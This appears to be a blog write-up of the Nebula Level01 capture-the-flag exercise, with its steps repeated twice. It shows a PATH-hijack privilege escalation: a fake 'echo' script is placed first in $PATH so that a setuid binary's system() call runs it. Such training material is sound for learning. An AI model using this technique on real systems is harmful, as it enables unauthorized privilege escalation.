Nebula Level01
Level01
Task
There is a vulnerability in the below programs to be executed, can you find it? To do this level, log in as the level01 account with password level01. Files for this level can be found in /home/flag01.
(level1.c)download
Solution
We login into the machine:
From the given task, files are in "flag01" home:
level01@nebula:~$ cd /home/flag01
level01@nebula:/home/flag01$ ls
flag01
level01@nebula:/home/flag01$
sifting through the source code provided, we can see a call to system function allowing the execution of echo in an altered environment. what this basically means is that we can craft our own "echo" program and then alter the $PATH environment variable such that when we execute the flag01 file, our own echo program gets executed in the context of flag01 owner.
first, we create a file named "echo" in our home directory:
level01@nebula:/home/flag01$ cd ~
level01@nebula:~$
level01@nebula:~$ echo "getflag" > echo
then we place our home directory which contains "echo" at the beginning of $PATH environment variable:
level01@nebula:~$
level01@nebula:~$ export PATH=/home/level01:$PATH
level01@nebula:~$
executing "getflag" in flag01 account using flag01 setuid file yields:
level01@nebula:~$ /home/flag01/flag01
level01@nebula:~$ You have successfully executed getflag on target account
Reference
https://en.wikipedia.org/wiki/Env
Task
There is a vulnerability in the below programs to be executed, can you find it? To do this level, log in as the level01 account with password level01. Files for this level can be found in /home/flag01.
Source code
We login into the machine:
ssh level01@192.168.195.5
level01@nebula:~$ cd /home/flag01
level01@nebula:/home/flag01$ ls
flag01
level01@nebula:/home/flag01$
first, we create a file named "echo" in our home directory:
level01@nebula:/home/flag01$ cd ~
level01@nebula:~$
level01@nebula:~$ echo "getflag" > echo
then we place our home directory which contains "echo" at the beginning of $PATH environment variable:
level01@nebula:~$
level01@nebula:~$ export PATH=/home/level01:$PATH
level01@nebula:~$
executing "getflag" in flag01 account using flag01 setuid file yields:
level01@nebula:~$ /home/flag01/flag01
level01@nebula:~$ You have successfully executed getflag on target account
Reference
https://en.wikipedia.org/wiki/Env
Comments
Post a Comment